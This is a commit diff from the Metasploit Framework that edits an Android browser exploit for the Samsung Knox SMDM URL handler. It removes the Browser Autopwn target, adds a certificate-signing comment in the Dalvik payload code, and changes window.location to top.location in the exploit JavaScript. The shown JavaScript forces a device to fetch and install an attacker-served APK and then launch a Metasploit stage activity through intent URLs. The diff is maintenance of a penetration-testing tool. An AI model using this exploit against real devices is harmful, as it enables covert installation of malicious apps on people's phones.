Remove BAP target, payload is flaky. Add warning.

Author: jvennix-r7

lib/msf/core/payload/dalvik.rb

@@ -60,6 +60,8 @@ def generate_cert
     # with a key whose validity expires before that date.
     # """
     cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
+
+    # If this line is left out, signature verification fails on OSX.
     cert.sign(key, OpenSSL::Digest::SHA1.new)
 
     return cert, key

modules/exploits/android/browser/samsung_knox_smdm_url.rb

@@ -9,23 +9,6 @@
 class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::BrowserExploitServer
-  include Msf::Exploit::Remote::BrowserAutopwn
-
-  autopwn_info(
-    :os_name    => OperatingSystems::Match::ANDROID,
-    :arch       => ARCH_ARMLE,
-    :javascript => true,
-    :rank       => ExcellentRanking,
-
-    # For BAP we only allow whitelisted devices/firmwares
-    # that we have tested:
-    # - Samsung S4
-    :vuln_test  => %Q|
-      is_vuln = navigator.userAgent.match(
-        /SAMSUNG GT-I9505/
-      );
-    |
-  )
 
   # Hash that maps payload ID -> (0|1) if an HTTP request has
   # been made to download a payload of that ID
@@ -56,6 +39,7 @@ def initialize(info = {})
       'Targets'             => [ [ 'Automatic', {} ] ],
       'DisclosureDate'      => 'Nov 12 2014',
       'DefaultTarget'       => 0,
+
       'BrowserRequirements' => {
         :source     => 'script',
         :os_name    => OperatingSystems::Match::ANDROID
@@ -150,18 +134,18 @@ def exploit_js
 
       function enroll() {
         var loc = window.location.href.replace(/[/.]$/g, '');
-        window.location = 'smdm://#{rand_word}?update_url='+
+        top.location = 'smdm://#{rand_word}?update_url='+
           encodeURIComponent(loc)+'/#{payload_id}.apk';
       }
 
       function killEnrollment() {
-        window.location = "intent://#{rand_word}?program="+
+        top.location = "intent://#{rand_word}?program="+
           "#{rand_word}/#Intent;scheme=smdm;launchFlags=268468256;end";
         setTimeout(launchApp, 300);
       }
 
       function launchApp() {
-        window.location='intent:view#Intent;SEL;component=com.metasploit.stage/.MainActivity;end';
+        top.location='intent:view#Intent;SEL;component=com.metasploit.stage/.MainActivity;end';
       }
 
       enroll();
@@ -170,10 +154,6 @@ def exploit_js
     |
   end
 
-  def apk_url
-    "#{get_uri.chomp('/')}/#{rand_word}.apk"
-  end
-
   def rand_word
     Rex::Text.rand_text_alphanumeric(3+rand(12))
   end